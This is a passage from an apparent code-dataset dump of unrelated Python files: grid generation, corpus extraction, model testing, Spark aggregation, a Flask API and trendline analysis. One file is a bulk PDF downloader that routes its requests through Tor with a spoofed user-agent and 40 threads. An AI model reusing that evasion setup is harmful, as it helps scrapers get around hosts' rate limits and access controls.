type')\n\texit()\n\n#Init X_new\nX_new = 1*x_old\nY_new = 1*y_old\n\nprint('Point number check')\nprint('hlo =',hlo)\nprint('p =',p)\n\n# relaxation parameter [MUST be in [1,2]]\nw1 = np.float64(1.82)\nw2 = uno - w1\n\nX0 = 1*x_old\nY0 = 1*y_old\n\nif dbg == 1:\n\tprint('Dimensions')\n\tprint('nxmax = ',nxmax)\n\tprint('nymax = ',nymax)\n\n\n# ................................................................ START MAIN LOOP\n#Iterate with SOR\nprint('Iteration and error')\nwhile it < nsmx and norm > tol:\n\n\tX0_old = 1*X0\n\tY0_old = 1*Y0\n\terr_x = 0.\n\terr_y = 0.\t\n\n\tif bddf == 2:\n\t\t#Fill halo points to cancel derivatives at the boundaries:\n\t\tfor i in range(hlo,nx+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\t\t\t\tX_new[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*X0[i,ny+hlo-k]\n\t\t\t\tY_new[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*Y0[i,ny+hlo-k]\n\n\t\t\t\tX_new[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*X0[i,hlo+k]\n\t\t\t\tY_new[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*Y0[i,hlo+k]\t\t\t\t\n\n\t\tfor j in range(hlo,ny+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\n\t\t\t\tX_new[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*X0[nx+hlo-k,j]\n\t\t\t\tY_new[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*Y0[nx+hlo-k,j]\t\n\n\t\t\t\tX_new[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*X0[hlo+k,j]\n\t\t\t\tY_new[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*Y0[hlo+k,j]\t\t\t\t\t\t\n\n\n\t#Grid control coefficients\n\tif gctl == 1:\n\n\t\t#Prepare the grid control functions at boundaries \n\t\t#BOT\n\t\tfor i in range(hlo,nx+hlo+1):\n\n\t\t\tx_hb = X0_old[i-hlo:i+hlo+1,hlo]\n\t\t\ty_hb = Y0_old[i-hlo:i+hlo+1,hlo]\n\t\t\tx_vb = X0_old[i,0:2*hlo+1]\n\t\t\ty_vb = Y0_old[i,0:2*hlo+1]\n\n\t\t\talpha = (np.dot(coef_d1,x_vb)/deta)**2 + (np.dot(coef_d1,y_vb)/deta)**2\n\t\t\tbeta = np.dot(coef_d1,x_vb)/deta*np.dot(coef_d1,x_hb)/dxi + np.dot(coef_d1,y_vb)/deta*np.dot(coef_d1,y_hb)/dxi\t\n\t\t\tgamma = (np.dot(coef_d1,x_hb)/dxi)**2 + (np.dot(coef_d1,y_hb)/dxi)**2\n\n\t\t\tJ = np.dot(coef_d1,x_hb)/dxi*np.dot(coef_d1,y_vb)/deta - np.dot(coef_d1,x_vb)/deta *np.dot(coef_d1,y_hb)/dxi\n\t\t\tA = alpha/dxi**2*np.dot(coef_d2,x_hb) + gamma/deta**2*np.dot(coef_d2,x_vb)\n\t\t\tB = alpha/dxi**2*np.dot(coef_d2,y_hb) + gamma/deta**2*np.dot(coef_d2,y_vb)\n\t\t\ts_eta = 1.0 #dsbt/deta\n\n\t\t\tden = np.sqrt(gamma)\n\n\t\t\tx_eta = -s_eta*np.dot(coef_d1,y_hb)/dxi/den\n\t\t\ty_eta = s_eta*np.dot(coef_d1,x_hb)/dxi/den\n\n\t\t\tphi[i,hlo] = 0. #(B*x_eta-A*y_eta)/J**3\n\t\t\tpsi[i,hlo] = 0. 
#(A*np.dot(coef_d1,y_hb)/dxi - B*np.dot(coef_d1,x_hb)/dxi)/J**3\n\n\t\t#TOP\n\t\tfor i in range(hlo,nx+hlo+1):\n\n\t\t\tx_hb = X0_old[i-hlo:i+hlo+1,hlo+ny]\n\t\t\ty_hb = Y0_old[i-hlo:i+hlo+1,hlo+ny]\n\t\t\tx_vb = X0_old[i,ny:ny+2*hlo+1]\n\t\t\ty_vb = Y0_old[i,ny:ny+2*hlo+1]\n\n\t\t\talpha = (np.dot(coef_d1,x_vb)/deta)**2 + (np.dot(coef_d1,y_vb)/deta)**2\n\t\t\tbeta = np.dot(coef_d1,x_vb)/deta*np.dot(coef_d1,x_hb)/dxi + np.dot(coef_d1,y_vb)/deta*np.dot(coef_d1,y_hb)/dxi\t\n\t\t\tgamma = (np.dot(coef_d1,x_hb)/dxi)**2 + (np.dot(coef_d1,y_hb)/dxi)**2\n\n\t\t\tJ = np.dot(coef_d1,x_hb)/dxi*np.dot(coef_d1,y_vb)/deta - np.dot(coef_d1,x_vb)/deta *np.dot(coef_d1,y_hb)/dxi\n\t\t\tA = alpha/dxi**2*np.dot(coef_d2,x_hb) + gamma/deta**2*np.dot(coef_d2,x_vb)\n\t\t\tB = alpha/dxi**2*np.dot(coef_d2,y_hb) + gamma/deta**2*np.dot(coef_d2,y_vb)\n\t\t\ts_eta = 0.9 #dstp/deta\n\n\t\t\tden = np.sqrt(gamma)\n\n\t\t\tx_eta = -s_eta*np.dot(coef_d1,y_hb)/dxi/den\n\t\t\ty_eta = s_eta*np.dot(coef_d1,x_hb)/dxi/den\n\n\t\t\tphi[i,hlo+ny] = (B*x_eta-A*y_eta)/J**3\n\t\t\tpsi[i,hlo+ny] = (A*np.dot(coef_d1,y_hb)/dxi - B*np.dot(coef_d1,x_hb)/dxi)/J**3\t\t\t\n\n\t\t#Fix distribution within the domain \n\t\tfor i in range(hlo,nx+hlo):\n\t\t\tfor j in range(hlo,ny+hlo):\n\t\t\t\tphi[i,j] = phi[i,hlo]*(1.-(eta[j-hlo]))**a_pl + phi[i,hlo+ny]*(eta[j-hlo])**b_pl\n\t\t\t\tpsi[i,j] = psi[i,hlo]*(1.-(eta[j-hlo]))**c_pl + psi[i,hlo+ny]*(eta[j-hlo])**d_pl\t\n\n\t#Main loop over interior points \n\tfor j in range(hlo+1,ny+hlo):\n\t\tfor i in range(hlo,nx+hlo+1):\n\n\t\t\t\t#Prepare coeffs\n\t\t\t\tx_h = X0[i-p:i+p+1,j]\n\t\t\t\tx_v = X0[i,j-p:j+p+1]\n\t\t\t\ty_h = Y0[i-p:i+p+1,j]\n\t\t\t\ty_v = Y0[i,j-p:j+p+1]\n\n\t\t\t\talpha = (np.dot(coef_d1,x_v)/deta)**2 + (np.dot(coef_d1,y_v)/deta)**2\n\t\t\t\tbeta = np.dot(coef_d1,x_v)/deta*np.dot(coef_d1,x_h)/dxi + np.dot(coef_d1,y_v)/deta*np.dot(coef_d1,y_h)/dxi\t\n\t\t\t\tgamma = (np.dot(coef_d1,x_h)/dxi)**2 + (np.dot(coef_d1,y_h)/dxi)**2\n\t\t\t\t\n\t\t\t\t#Prepare cross-derivative \n\t\t\t\tx_hv = X0[i-p:i+p+1,j-p:j+p+1]\n\t\t\t\ty_hv = Y0[i-p:i+p+1,j-p:j+p+1]\n\n\t\t\t\t#Remove xij/yij from previous\n\t\t\t\tx_h[p] = zro\n\t\t\t\tx_v[p] = zro\n\t\t\t\ty_h[p] = zro\n\t\t\t\ty_v[p] = zro\n\t\t\t\tx_hv[p,p] = zro\n\t\t\t\ty_hv[p,p] = zro\n\n\t\t\t\t#Prepare various terms \n\t\t\t\tterm1x = alpha/dxi**2*np.dot(coef_d2,x_h) \n\t\t\t\tterm2x = -2.*beta/deta/dxi*np.dot( coef_d1, np.dot(coef_d1,x_hv) )\n\t\t\t\tterm3x = gamma/deta**2*np.dot(coef_d2,x_v)\n\n\t\t\t\tterm1y = alpha/dxi**2*np.dot(coef_d2,y_h) \n\t\t\t\tterm2y = -2.*beta/deta/dxi*np.dot( coef_d1, np.dot(coef_d1,y_hv) )\n\t\t\t\tterm3y = gamma/deta**2*np.dot(coef_d2,y_v) \n\n\t\t\t\t#Grid control terms\n\t\t\t\tif gctl == 1:\n\t\t\t\t\tJ = np.dot(coef_d1,x_h)/dxi*np.dot(coef_d1,y_v)/deta - np.dot(coef_d1,x_v)/deta *np.dot(coef_d1,y_h)/dxi \n\t\t\t\t\tterm1x = term1x + J**2*( phi[i,j]*np.dot(coef_d1,x_h)/dxi + psi[i,j]*np.dot(coef_d1,x_v)/deta)\n\t\t\t\t\tterm1y = term1y + J**2*( phi[i,j]*np.dot(coef_d1,y_h)/dxi + psi[i,j]*np.dot(coef_d1,y_v)/deta)\n\t\n\t\t\t\t#Lead coeff\n\t\t\t\tcoef_l = alpha/dxi**2*coef_d2[p] - 2.*beta/deta/dxi*coef_d1[p]**2 +gamma/deta**2*coef_d2[p]\n\n\t\t\t\t#Compute xij/yij\n\t\t\t\tx_updt = 0.\n\t\t\t\ty_updt = 0.\n\n\t\t\t\tx_updt = -1./coef_l*(term1x + term2x + term3x)\n\t\t\t\ty_updt = -1./coef_l*(term1y + term2y + term3y)\n\n\t\t\t\t#Error\n\t\t\t\tif i > hlo and i < nx + hlo :\n\t\t\t\t\tif abs(x_updt - X0_old[i,j]) > err_x:\n\t\t\t\t\t\terr_x = abs(x_updt - X0_old[i,j])/abs(X0_old[i,j]) 
#/abs(x_updt)\n\t\t\t\tif abs(y_updt - Y0_old[i,j]) > err_y:\n\t\t\t\t\terr_y = abs(y_updt - Y0_old[i,j])/abs(Y0_old[i,j]) #/abs(y_updt)\n\n\t\t\t\t#Update X_new / Y_new\n\t\t\t\tif i > hlo and i < nx + hlo:\n\t\t\t\t\tX_new[i,j] = x_updt\n\t\t\t\telse:\n\t\t\t\t\tX_new[i,j] = X0_old[i,j]\n\t\t\t\tY_new[i,j] = y_updt\n\t\t\t\t\t\n\n\t#Check convergence tolerance\n\tnorm = max(err_x,err_y)\n\n\t#Replace old grid\n\t# X_new = w1*X_new + w2*X0\n\t# Y_new = w1*Y_new + w2*Y0\n\n\tX0 = X_new\n\tY0 = Y_new\n\n\t#Advance step\n\tit = it + 1\n\tif it % 20 == 0 :\n\t\tprint(it, norm, end=\"\\r\" )\n\nif it >= nsmx : \n\tprint(' ')\n\tprint('WARNING')\n\tprint('Exited loop because max iterations achieved')\n\tprint('Last it =',it )\n\nprint('' )\nprint('Final step and error')\t\nprint('it = ',it)\nprint('err = ',norm)\n\n#Put back into xnew \nx_new = 1*X_new\ny_new = 1*Y_new\n\n# -----------------------------------------------------------------------------------#\n# Output: visualise the results\n\nif f1sh == 1:\n\n\tfig = plt.figure()\n\n\t#First plot: eta vs xi\n\tax1 = fig.add_subplot(121,aspect='equal')\n\tax1.set(xlabel=r'$\\xi$',ylabel=r'$\\eta$')\n\tfor i in range(0,nx+1):\n\t\tvert = np.linspace(xi[i],xi[i],eta.size)\n\t\tax1.plot(vert,eta,ls='-',color='black')\n\tfor j in range(0,ny+1):\t\n\t\thori = np.linspace(eta[j],eta[j],xi.size)\n\t\tax1.plot(xi,hori,ls='-',color='black')\n\n\tif st == 1 :\n\t\tax1.set_title('Computational space')\t\n\n\n\t#First plot: y v x \n\tax2 = fig.add_subplot(122,aspect='equal')\n\tax2.set(xlabel=r'$x$',ylabel=r'$y$')\n\tfor i in range(0,nx+1):\n\t\tax2.plot(x[i,:],y[i,:],ls='-',color='black')\n\tax2.plot(x[0,:],y[0,:],ls='-',color='red')\t\n\tax2.plot(x[nx,:],y[nx,:],ls='-',color='red')\t\n\tfor j in range(0,ny+1):\t\n\t\tax2.plot(x[:,j],y[:,j],ls='-',color='black')\n\tax2.plot(x[:,0],y[:,0],ls='-',color='red')\n\tax2.plot(x[:,ny],y[:,ny],ls='-',color='red')\n\tax2.yaxis.tick_right()\n\t\n\n\tif st == 1:\n\t\tax2.set_title('Physical space')\t\n\n\n\tfig.savefig('comp_phys_space.eps',format='eps',dpi=dpi)\n\t\n\nif f2sh == 1 :\n\n\tfig2 = plt.figure()\n\n\t#First plot: xini vs yini\n\tax21 = fig2.add_subplot(121,aspect='equal')\n\tax21.set(xlabel=r'$x$',ylabel=r'$y$')\n\tfor i in range(0,nx+1):\n\t\tax21.plot(x[i,:],y[i,:],ls='-',color='black')\n\tax21.plot(x[0,:],y[0,:],ls='-',color='red')\t\n\tax21.plot(x[nx,:],y[nx,:],ls='-',color='red')\t\t\n\tfor j in range(0,ny+1):\t\n\t\tax21.plot(x[:,j],y[:,j],ls='-',color='black')\n\tax21.plot(x[:,0],y[:,0],ls='-',color='red')\n\tax21.plot(x[:,ny],y[:,ny],ls='-',color='red')\t\n\n\tif st == 1 :\n\t\tax21.set_title('Initial guess')\t\n\n\n\t#Second plot: y v x \n\tax22 = fig2.add_subplot(122,aspect='equal')\n\tax22.set(xlabel=r'$x$',ylabel=r'$y$')\n\tfor i in range(0,nx+2*hlo+1):\n\t\tax22.plot(x_new[i,p:ny+1+p],y_new[i,p:ny+1+p],ls='-',color='black')\n\tfor j in range(0,ny+2*hlo+1):\t\n\t\tax22.plot(x_new[p:nx+1+p,j],y_new[p:nx+1+p,j],ls='-',color='black')\n\tax22.plot(x[:,0],y[:,0],ls='-',color='red')\n\tax22.plot(x[:,ny],y[:,ny],ls='-',color='red')\t\n\tax22.plot(x[0,:],y[0,:],ls='-',color='red')\t\n\tax22.plot(x[nx,:],y[nx,:],ls='-',color='red')\t\t\n\tax22.yaxis.tick_right()\n\n\tif st == 1:\n\t\tax22.set_title('Iterated solution')\t\n\n\tfig2.savefig('init_conv.eps',format='eps',dpi=dpi)\t\n\n\n#Shw figure\nif sf == 1:\n\n\tplt.show()\n\n# 
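# --- aside: the w1/w2 blend commented out in the main loop above is standard
# successive over-relaxation: x_new = w*x_gs + (1-w)*x_old with w in (1, 2),
# matching the w1 = 1.82 set earlier. A toy 1D Laplace solve showing the
# shape of the update (not the grid solver above):
import numpy as np

def sor_1d(n=20, w=1.8, iters=500):
    x = np.zeros(n)
    x[0], x[-1] = 0.0, 1.0                 # fixed boundary values
    for _ in range(iters):
        for i in range(1, n - 1):
            gs = 0.5 * (x[i - 1] + x[i + 1])   # Gauss-Seidel value
            x[i] = w * gs + (1.0 - w) * x[i]   # over-relaxed update
    return x

print(sor_1d())  # converges to the straight line between the boundaries
# --- end aside ---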
-----------------------------------------------------------------------------------#","sub_path":"curv_mesh/grid_generation/grid_1.py","file_name":"grid_1.py","file_ext":"py","file_size_in_byte":17609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"81682298","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#\n# was adjnoun.py\n#\n\n# program to extract data about nouns modified by colour adjectives from the BNC\n# created gbt, July 2011\n# modified mcg, 2012/01/23\n\n### import\n\n# gbt's modules:\nimport sys\nfrom datetime import datetime\nfrom classes4bnc import Pair, Node, Sentence \nimport pandas as pd\n#from classes4bnc import *# import defined classes (same namespace!)\n### from generalfuncs import *\nfinal_list = []\n### functions ###\ndef yield_lines(list_line):\n \n final_list.append(list_line)\n return final_list\n\ndef token_type(token):\n token_begin = token[:3]\n if token == \"\": # empty line\n return False\n elif token_begin == \"\":\n return \"sentencebegin\"\n elif token_begin == \" -1:\n listTup[num].add1()\n #print(listTup[num].tup[0]+ \"-\" + listTup[num].tup[1] + \" has been found \" + str(listTup[num].getNum()) + \" times\")\n else:\n listTup.append(Pair(act))\n #print(listTup[num].tup[0]+ \"-\" + listTup[num].tup[1] + \" has been found for the first time\")\n\ndef process_bnc_mod():\n i = 0\n s_id = 0\n within_sent = False\n limit = 10000#124529467 number of tokens in bnc.xml plus two\n #limit = 1000000\n bnc = open(home + 'bnc.xml', 'r')\n while i < limit:\n if(i%25000 == 0) and (i != 0):\n print(\"Processed \" + str(i) + \" lines\")\n if(i%1245294 == 0):\n print(\"Processed \" + str(i) + \" from \" + str(limit) + \" lines, (\" + str((i/limit)*100) + \"%)\")\n i = i + 1\n iamin = \"token: \" + str(i)+ \"\\n\\t\"\n line = bnc.readline()\n if token_type(line) == \"sentencebegin\": # count sentences\n if within_sent == True: # errors in the corpus coding...\n pass\n else:\n within_sent = True\n s_id=s_id+1\n newsent = Sentence(s_id) # sentence id\n elif token_type(line) == \"sentenceend\": # process sentence and flush\n within_sent = False # finish sentence\n try:\n newsent.assign_parents()\n except:\n msg = iamin + str(newsent) + \"\\n\"\n sys.stderr.write(msg)\n anlist = find_an(newsent) # returns list with a and n\n for tupla in anlist:\n checkList(tupla)\n del(newsent)\n elif token_type(line) == \"word\":\n itemlist = line.split()\n yield_lines(itemlist)\n #burada liste olarak itemler geliyor\n try:\n node = Node(atts=itemlist)\n except:\n msg = iamin + str(newsent) + \"\\n\"\n sys.stderr.write(msg)\n newsent.append_node(node)\n elif token_type(line) == False:\n sys.stderr.write(\"* Reached EOF *\\n\")\n break\n bnc.close()\n msg = \"Done! 
Number of sentences processed: \" + str(s_id) + \", and tokens: \" + str(i) + \"\\n\"\n sys.stderr.write(msg)\n #return freq_of\n \n### main ###\n\n### global variables\nhome = '/Users/hmtkv/Google Drive/Yeni/UPF/Classes!/Comp Sem/Project/data/'\n#dropbox = home + 'Dropbox/distsem/'\n#nounlistfile = dropbox + 'data/head_nouns/nounswithcolouradjs.txt'\ncsvfile = home + 'output.csv'\n\n# *** TO DO: separate freq_of from selected_nouns ***\nminfreq = 0 # make it a user-controlable parameter for the script?\nlistTup = []\n\na = datetime.now()\nprint(\"[Begin]\")\n\nprint(\"Let's start...\")\nprocess_bnc_mod()\n\nof = open(csvfile, 'w')\nof.flush()\ntext = \"Adj;Noun;Occurrences\\n\"\nof.write(text)\n#for i,line in enumerate(lines):\n # if i < 2: continue\n #foo(line)\nfor el in listTup:\n if(el.getNum() >= minfreq):\n #tam sayıyı aldırma => str(el)[-2:]\n print(str(el) + \" appears \" + str(el).split(\";\")[1] + \" times(min frequency=\", minfreq,\")it's added to the output list\")\n info = str(el)\n of.write(info +\"\\n\")\n\ncsv_data = home + 'sample_data.csv'\n#1-------------------------------------\n#pof.flush()\n#for lines in final_list:\n# pof = open(csv_data, 'w')\n# text = str(lines)\n# pof.write(text)\n# pof.write(\"\\n\")\n# pof.close()\n\n#2-------------------------------------\ndf = pd.DataFrame(final_list)\ndf.to_csv(csv_data, sep=',',index=False)\n\n \n\n\nb = datetime.now()\n\nof.close()\nprint(\"Process finished!\")\nc = b - a\nprint(\"Time spent (sec):\" + str(c.seconds))\nprint(csvfile + \" created!\")\nprint(\"[End]\")\n\n","sub_path":"xtract-data-from-corpus.py","file_name":"xtract-data-from-corpus.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"400785991","text":"from model import ZeroNet\nimport torch\nfrom data_utils import STL10Loader\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nmodel = ZeroNet(num_classes=10)\nPATH = 'saved_model'\nmodel.load_state_dict(torch.load(PATH, map_location=device))\n\nstl10 = STL10Loader()\ntest_loader = stl10.get_loader('test')\n\nwith torch.no_grad():\n model = model.to(device)\n model.eval()\n cnt = 0\n correct = 0\n for batch_index, (X, y) in enumerate(test_loader):\n X, y = X.to(device), y.to(device)\n scores = model(X)\n predict = scores.argmax(dim=-1)\n correct += predict.eq(y.view_as(predict)).cpu().sum()\n cnt += predict.size(0)\n\n test_progress = 'Progress: [{}/{} ({:.0f}%)]'.format(\n (batch_index+1), len(test_loader), 100. 
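# --- aside: checkList above does a linear scan of listTup for every pair,
# which is O(n^2) over the corpus. collections.Counter gives the same
# adjective-noun counts in one pass. A sketch, assuming find_an yields
# (adj, noun) tuples:
from collections import Counter

pair_counts = Counter()
for adj, noun in [('red', 'car'), ('red', 'car'), ('blue', 'sky')]:
    pair_counts[(adj, noun)] += 1

for (adj, noun), n in pair_counts.most_common():
    print('{};{};{}'.format(adj, noun, n))
# --- end aside ---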
* (batch_index+1) / len(test_loader))\n print(test_progress, end='\\r')\n print()\n\n test_acc = correct.cpu().item()/cnt*100\n print(\"Test accuracy: {:.2f}%\".format(test_acc))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2344923","text":"#!/usr/bin/python3\nimport os\nimport time\nimport pickle\nimport shutil\nimport random\nimport urllib\nimport requests\nimport concurrent.futures\nimport gc\nfrom urllib.request import urlopen\nfrom termcolor import colored\nfrom utils import Config, safe_pickle_dump\n\nprintgreen = lambda q: print(colored(q, 'green'))\nprintred = lambda q: print(colored(q, 'red'))\n\nimport signal\nimport sys\ndef signal_handler(sig, frame):\n printred('Program interrupted, saving database...')\n safe_pickle_dump(db, Config.db_path)\n printgreen('Saved, now exiting')\n sys.exit(0)\nsignal.signal(signal.SIGINT, signal_handler)\n\n\nsession = requests.session()\nsession.proxies = {\n 'http': 'socks5://localhost:9050',\n 'https': 'socks5://localhost:9050'\n}\nheaders = {\n 'User-agent': 'HotJava/1.1.2 FCS'\n}\n\ndb = pickle.load(open(Config.db_path, 'rb'))\n\ndef refreshNeeded():\n have = set(os.listdir(Config.pdf_dir))\n print(\"Database Size: %d \\nNumber of current PDFs: %d\" % (len(db), len(have)) )\n print(\"Number of entries not downloaded: %d\" % int(len(db) - len(have)))\n entries = []\n numhtml = 0\n for db_key, j in db.items():\n pdfs = [x['href'] for x in j['links'] if x['type'] == 'application/pdf']\n assert len(pdfs) == 1\n if ('ishtml' in db[db_key] and db[db_key]['ishtml'] == True):\n numhtml = numhtml + 1\n #print(db_key)\n continue\n pdf_url = pdfs[0] + '.pdf'\n basename = pdf_url.split('/')[-1]\n fname = os.path.join(Config.pdf_dir, basename)\n if not basename in have:\n entries.append({\n 'key': db_key,\n 'url': pdf_url,\n 'basename': basename,\n 'filename': fname\n })\n print(\"Number of entries that only returned an HTML page: %d\" % numhtml)\n print(\"Number of new entries to be downloaded: %d\" % len(entries))\n return entries\n\n\n\n\ndef load_url(pdf_url):\n return session.get(pdf_url, timeout = 30)\n\ndef reqToFile(db_key, basename, filename, req):\n if ('ishtml' in db[db_key] and db[db_key]['ishtml'] == True):\n return\n if (req.ok and req.headers['Content-Type'] == 'application/pdf'):\n with open(filename, 'wb') as f:\n f.write(req.content)\n print(\".\", end='', flush=True)\n db[db_key]['ishtml'] = False\n elif ('text/html' in req.headers['Content-Type']):\n db[db_key]['ishtml'] = True\n raise ValueError(f\"{db_key}: was HTML instead of PDF\")\n else:\n raise Exception(f\"{db_key}: Unknown error\")\n\n\nbatch_size = 2500\nnewEntries = refreshNeeded()\nwith concurrent.futures.ThreadPoolExecutor(max_workers=40) as executor:\n while(len(newEntries) > 0):\n batch = newEntries[0:batch_size]\n print(\"New batch, number of new entries to download: %d\" % len(batch))\n future_to_url = { executor.submit(load_url, entry['url']): entry for entry in batch }\n for future in concurrent.futures.as_completed(future_to_url):\n if(random.randrange(0, 100) > 98):\n safe_pickle_dump(db, Config.db_path)\n print(\"Database saved.\")\n try:\n this_entry = future_to_url[future]\n req = future.result()\n reqToFile(this_entry['key'], this_entry['basename'], this_entry['filename'], req)\n except Exception as e:\n print('')\n print(e)\n print('')\n printgreen('Batch done, saving database.')\n safe_pickle_dump(db, 
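# --- aside: the socks5:// proxies above need the PySocks extra
# (pip install requests[socks]). Using the socks5h:// scheme instead makes
# DNS resolve on the proxy side, which matters when routing through Tor.
# Minimal shape of the session setup:
import requests

session = requests.session()
session.proxies = {
    'http': 'socks5h://localhost:9050',
    'https': 'socks5h://localhost:9050',
}
# --- end aside ---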
Config.db_path)\n newEntries = refreshNeeded()\n gc.collect()\n\nprint(\"Done, saving database.\")\nsafe_pickle_dump(db, Config.db_path)\n","sub_path":"tor_download.py","file_name":"tor_download.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198164418","text":"from pyspark import SparkContext, SQLContext\nfrom pyspark.sql import *\n\nsc = SparkContext()\nsqlContext = SQLContext(sc)\n\norderItemLine = sc.textFile(\"hdfs://localhost:8020/user/cloudera/problem9/data/orderItems\")\norderItem = orderItemLine.map(lambda x: x.split(\"|\"))\norderItemSchema = orderItem.map(lambda x: Row(order_item_id=int(x[0]),\n order_item_order_id=int(x[1]),\n order_item_product_id=int(x[2]),\n order_item_quantity=int(x[3]),\n order_item_subtotal=float(x[4]),\n order_item_product_price=float(x[5])))\n\norderDF = sqlContext.createDataFrame(orderItemSchema)\n# orderDF.show()\norderDF.registerTempTable(\"orders\")\ndf_output = sqlContext.sql(\"select order_item_product_id, order_item_product_price, sum(order_item_quantity) as total_quantity from orders group by order_item_product_id, order_item_product_price\")\n# df_output.show()\ndf_output.coalesce(1).write.option(\"compression\",\"SNAPPY\").parquet(\"hdfs://localhost:8020/user/cloudera/problem9/solution\")\n\n\n","sub_path":"Set-2/q9-2.py","file_name":"q9-2.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"48752827","text":"from flask import Flask\nfrom flask_restful import Api\nfrom sql_alchemy import db\nfrom Resources.cats import Cats, Cat\n\napp = Flask(__name__)\napi = Api(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db'\n\n@app.before_first_request\ndef cria_banco():\n db.create_all()\n\napi.add_resource(Cats, \"/cats\")\napi.add_resource(Cat, \"/cats/\")\n\nif __name__ == \"__main__\":\n\tdb.init_app(app)\n\tapp.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"425873829","text":"import datetime\nfrom libs.configs import getConfig\nimport trendln\nimport numpy as np\nimport pandas as pd\n\n\nclass Calculation:\n def __init__(self, maxn_points=None, n_recalc_period=5, offset=3) -> None:\n self.last_price = None\n self.timestamp = None\n self.ohlcs: pd.DataFrame = None\n self.token = None\n self.offset = offset\n self.n_recalc_period = n_recalc_period\n self.n_since_calc = -1\n if(maxn_points):\n self.maxn_points = maxn_points\n else:\n self.maxn_points = int(getConfig('maxn_points'))\n self.psup = self.pres = None\n self.shistory = []\n self.rhistory = []\n self.cbs = set()\n self.maximas = []\n self.minimas = []\n self.maxima = None\n self.minima = None\n self.supslope = None\n self.resslope = None\n self.retracement_levels = None\n\n def subscribe(self, cb):\n self.cbs.add(cb)\n\n def calc_trendln(self):\n offset = self.offset\n if(len(self.ohlcs) < self.offset):\n offset = 0\n datapoints = self.ohlcs.iloc[-self.maxn_points:-offset]\n if(datapoints is None):\n return\n n = len(datapoints)\n acc = int(getConfig('ACCURACY'))\n try:\n mins, maxs = trendln.calc_support_resistance(\n datapoints['Close'], accuracy=acc)\n except Exception as ex:\n print('[ERROR]', ex.__str__())\n return\n\n (minimaIdxs, pmin, mintrend, minwindows), (maximaIdxs,\n pmax, maxtrend, maxwindows) = mins, maxs\n 
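# --- aside: the registerTempTable + SQL aggregation above has a direct
# DataFrame-API equivalent (same grouping, no temp table). A minimal sketch
# on a toy frame; spark here is a SparkSession rather than the SQLContext
# used above:
from pyspark.sql import SparkSession, functions as F

spark = SparkSession.builder.master('local[1]').getOrCreate()
rows = [(1, 9.99, 2), (1, 9.99, 3), (2, 5.00, 1)]
df = spark.createDataFrame(rows, ['order_item_product_id',
                                  'order_item_product_price',
                                  'order_item_quantity'])
out = (df.groupBy('order_item_product_id', 'order_item_product_price')
         .agg(F.sum('order_item_quantity').alias('total_quantity')))
out.show()
# --- end aside ---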
'also shift the center to right by n'\n if(not np.nan in pmin):\n self.psup = np.poly1d([pmin[0], pmin[1]+pmin[0]*n])\n self.supslope = pmin[0]\n if(not np.nan in pmax):\n self.pres = np.poly1d([pmax[0], pmax[1]+pmax[0]*n])\n self.resslope = pmax[0]\n\n if(maximaIdxs):\n self.maximas = [(datapoints.index[x], datapoints.iloc[x]['Close'])\n for x in maximaIdxs]\n if(minimaIdxs):\n self.minimas = [(datapoints.index[x], datapoints.iloc[x]['Close'])\n for x in minimaIdxs]\n\n if(self.maximas and self.supslope):\n if(self.supslope > 0):\n 'get the last prominent maxima '\n maxid = maximaIdxs[-1]\n self.maxima = datapoints.index[maxid], datapoints.iloc[maxid]['Close']\n 'if there are maximas in close proximity, take the max'\n for r in range(maxid-3, maxid):\n if(r in maximaIdxs and datapoints.iloc[r]['Close'] > self.maxima[1]):\n self.maxima = datapoints.index[r], datapoints.iloc[r]['Close']\n maxid = r\n if(self.minimas):\n 'for minima preceeding the maxima'\n minimaIdxs2 = [x for x in minimaIdxs if x < maxid]\n minid = minimaIdxs2[-1]\n self.minima = datapoints.index[minid], datapoints.iloc[minid]['Close']\n for r in range(minid-3, minid):\n if(r in minimaIdxs2 and datapoints.iloc[r]['Close'] < self.minima[1]):\n self.minima = datapoints.index[r], datapoints.iloc[r]['Close']\n minid = r\n\n if(self.maxima and self.minima):\n 'calculate the fib retracement levels'\n fib_ratios = [0, 0.236, 0.382, 0.5, 0.618, 0.786, 1]\n self.retracement_levels = [self.maxima[1]-(\n self.maxima[1]-self.minima[1])*ratio for ratio in fib_ratios]\n\n if(self.minimas and self.resslope):\n if(self.resslope < 0):\n minid = minimaIdxs[-1]\n self.minima = datapoints.index[minid], datapoints.iloc[minid]['Close']\n for r in range(minid-3, minid):\n if(r in minimaIdxs and datapoints.iloc[r]['Close'] < self.minima[1]):\n self.minima = datapoints.index[r], datapoints.iloc[r]['Close']\n minid = r\n if(self.maximas):\n 'for minima preceeding the maxima'\n maximaIdxs2 = [x for x in maximaIdxs if x < minid]\n maxid = maximaIdxs2[-1]\n self.maxima = datapoints.index[maxid], datapoints.iloc[maxid]['Close']\n for r in range(maxid-3, maxid):\n if(r in maximaIdxs2 and 